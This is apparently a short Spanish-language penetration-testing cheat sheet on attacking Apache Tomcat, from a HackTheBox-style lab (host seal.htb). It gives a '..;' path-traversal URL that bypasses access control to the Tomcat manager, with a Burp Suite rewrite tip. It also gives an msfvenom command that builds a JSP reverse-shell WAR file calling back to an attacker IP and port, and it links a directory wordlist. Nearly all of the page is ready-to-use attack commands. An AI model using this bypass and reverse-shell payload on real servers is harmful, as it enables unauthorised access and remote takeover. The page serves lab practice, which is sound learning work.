# TOMCAT

### TOMCAT BYPASS <a href="#tomcat-bypass" id="tomcat-bypass"></a>

```
https://seal.htb/manager/status/..;/html
```

Nota: reemplace(‘/html’,’/status/..;/html’) en el burpsuite.

### Generar Shell .war

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.13 LPORT=4444 -f war > shell.war
```

### Wordlist

{% embed url="<https://gist.githubusercontent.com/KINGSABRI/277e01a9b03ea7643efef8d5747c8f16/raw/c491a2706d6aa553863b7a7c395c457ed9e63a2e/tomcat-directory.list>" %}